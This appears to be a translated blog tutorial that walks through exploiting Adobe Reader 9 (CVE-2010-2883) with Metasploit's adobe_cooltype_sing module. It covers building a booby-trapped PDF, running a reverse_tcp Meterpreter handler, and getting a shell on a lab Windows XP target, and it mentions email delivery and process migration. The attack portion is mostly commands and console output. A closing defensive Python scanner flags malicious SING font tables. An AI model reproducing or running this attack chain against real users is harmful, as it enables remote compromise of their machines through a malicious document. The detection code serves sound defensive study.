Client-side penetration: exploitation via the PDF file format

Copyright notice: this is the blogger's original article; reproduction without the blogger's permission is not allowed. https://blog.csdn.net/l1028386804/article/details/86633022

Please cite the source when reposting: https://blog.csdn.net/l1028386804/article/details/86633022

Attacker: Kali, 192.168.175.128

Target: Windows XP, 192.168.175.130

Vulnerable program: Adobe Reader 9.0 (the adobe_cooltype_sing module exploits the CoolType SING table "uniqueName" stack overflow, CVE-2010-2883, which affects Adobe Reader and Acrobat 9.3.4 and earlier)

1. Generate the PDF file

msfconsole
use exploit/windows/fileformat/adobe_cooltype_sing 
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.175.128
show options
exploit

The full session looks like this:

msf5 > use exploit/windows/fileformat/adobe_cooltype_sing 
msf5 exploit(windows/fileformat/adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/fileformat/adobe_cooltype_sing) > set LHOST 192.168.175.128
LHOST => 192.168.175.128
msf5 exploit(windows/fileformat/adobe_cooltype_sing) > show options

Module options (exploit/windows/fileformat/adobe_cooltype_sing):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.pdf          yes       The file name.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.175.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

   **DisablePayloadHandler: True   (RHOST and RPORT settings will be ignored!)**


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/fileformat/adobe_cooltype_sing) > exploit

[*] Creating 'msf.pdf' file...
[+] msf.pdf stored at /root/.msf4/local/msf.pdf
msf5 exploit(windows/fileformat/adobe_cooltype_sing) > 

As the output shows, msf.pdf has been written to /root/.msf4/local/. Note the "DisablePayloadHandler: True" line: this module only builds the file, it does not start a listener, so the handler has to be started separately in step 3.

In a real engagement you still have to get this file in front of the victim (typically as a mail attachment or a download link). To keep things simple here, I just copy the file straight to the target machine.

2. Deliver the PDF to the target

Copy the generated msf.pdf to the target machine.

3. Launch the attack (start the handler)

msfconsole
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.175.128
exploit

The full session looks like this. LHOST and LPORT must match the values that were baked into msf.pdf in step 1 (192.168.175.128 and the default 4444), otherwise the stager has nothing to connect back to:

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set LHOST 192.168.175.128
LHOST => 192.168.175.128
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.175.128:4444 

4. Open the PDF file

On the target, open the PDF with Adobe Reader 9.0.

5. Check the Meterpreter session

Back on the Kali attacker, the MSF console shows that a Meterpreter session has been opened.

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.175.128:4444 
[*] Sending stage (179779 bytes) to 192.168.175.130
[*] Meterpreter session 1 opened (192.168.175.128:4444 -> 192.168.175.130:1431) at 2019-01-24 16:05:52 +0800

meterpreter > 

Finally, it is best to use the migrate command to move the session into another process right away: it currently lives inside the Reader process (AcroRd32.exe), which is left in a hung state by the overflow and dies as soon as the victim closes it, taking the session with it.
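To see what the generated file actually contains, and to have something to run on the defensive side, here is an added example (my own Python, not code from the original post or from the Metasploit module) that scans a PDF for embedded TrueType fonts carrying a SING table and reports whether the 28-byte uniqueName field is NUL-terminated. The trigger for CVE-2010-2883 is a uniqueName with no terminator inside those 28 bytes, which CoolType strcat()s into a 256-byte stack buffer. The SING layout (eight uint16 fields, then uniqueName at offset 16) follows Adobe's SING glyphlet table; the PDF handling is a deliberately small heuristic (FlateDecode or raw streams only, no object streams, the last /Length before a stream wins), and the sample fonts and PDF are constructed fixtures, not the real msf.pdf.

```python
"""Scan a PDF for embedded sfnt fonts whose SING table would trigger the
CoolType uniqueName overflow (CVE-2010-2883, the bug behind
exploit/windows/fileformat/adobe_cooltype_sing)."""
import re
import struct
import zlib

SING_UNIQUENAME_OFFSET = 16   # eight uint16 header fields precede uniqueName
SING_UNIQUENAME_LEN = 28      # uniqueName is a 28-byte NUL-terminated string
SFNT_MAGICS = (b"\x00\x01\x00\x00", b"true", b"OTTO")

# A stream dictionary followed by the 'stream' keyword and its EOL.
DICT_STREAM_RE = re.compile(rb"<<(.*?)>>\s*stream\r?\n", re.DOTALL)
# A direct integer /Length (skips indirect references such as '/Length 4 0 R').
LENGTH_RE = re.compile(rb"/Length\s+(\d+)\b(?!\s+\d+\s+R)")


def pdf_streams(pdf):
    """Yield the raw body of every stream object. Uses the last direct
    /Length seen before the stream; falls back to searching for 'endstream'."""
    for m in DICT_STREAM_RE.finditer(pdf):
        start = m.end()
        lengths = LENGTH_RE.findall(m.group(1))
        if lengths:
            end = start + int(lengths[-1])
        else:
            end = pdf.find(b"endstream", start)
            if end < 0:
                continue
        yield pdf[start:end]


def sfnt_tables(font):
    """Return {tag: bytes} for the table directory of an sfnt blob, or {}."""
    if len(font) < 12 or font[:4] not in SFNT_MAGICS:
        return {}
    num_tables = struct.unpack(">H", font[4:6])[0]
    tables = {}
    for i in range(num_tables):
        rec = font[12 + 16 * i: 28 + 16 * i]
        if len(rec) < 16:
            break  # truncated table directory
        tag, _checksum, offset, length = struct.unpack(">4sIII", rec)
        tables[tag] = font[offset: offset + length]
    return tables


def check_sing(sing):
    """'overflow' if uniqueName has no NUL within its 28 bytes (strcat() will
    run past it), 'ok' if it is terminated, 'short' if the table is truncated."""
    field = sing[SING_UNIQUENAME_OFFSET: SING_UNIQUENAME_OFFSET + SING_UNIQUENAME_LEN]
    if len(field) < SING_UNIQUENAME_LEN:
        return "short"
    return "ok" if b"\x00" in field else "overflow"


def scan_pdf(pdf):
    """Return [(stream_index, verdict)] for every stream that parses as an
    sfnt with a SING table, trying the FlateDecoded body first, then raw."""
    findings = []
    for idx, raw in enumerate(pdf_streams(pdf)):
        candidates = [raw]
        try:
            candidates.insert(0, zlib.decompress(raw))
        except zlib.error:
            pass
        for blob in candidates:
            tables = sfnt_tables(blob)
            if b"SING" in tables:
                findings.append((idx, check_sing(tables[b"SING"])))
                break
    return findings


# --- constructed fixtures (not the real msf.pdf) ---------------------------

def build_font(unique_name):
    """Minimal sfnt whose only table is a SING table with the given uniqueName."""
    sing = (struct.pack(">8H", 1, 0, 1, 0, 0, 1000, 0, 0)
            + unique_name.ljust(SING_UNIQUENAME_LEN, b"\x00")[:SING_UNIQUENAME_LEN]
            + b"\x00" * 16)                      # METAMD5 placeholder
    header = b"\x00\x01\x00\x00" + struct.pack(">4H", 1, 16, 0, 0)
    record = struct.pack(">4sIII", b"SING", 0, 28, len(sing))  # data starts at 12+16
    return header + record + sing


def build_pdf(font):
    """One-object PDF embedding `font` as a FlateDecoded FontFile2-style stream."""
    data = zlib.compress(font)
    return (b"%PDF-1.4\n1 0 obj\n<< /Length " + str(len(data)).encode()
            + b" /Filter /FlateDecode >>\nstream\n" + data
            + b"\nendstream\nendobj\n%%EOF\n")


if __name__ == "__main__":
    print("malicious:", scan_pdf(build_pdf(build_font(b"A" * 28))))
    print("benign:   ", scan_pdf(build_pdf(build_font(b"glyphlet-1"))))
```

Any SING table at all is worth a second look, since SING glyphlets are rare in ordinary documents, but the "overflow" verdict is the concrete indicator that the font was built to hit the strcat() bug rather than to be rendered.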
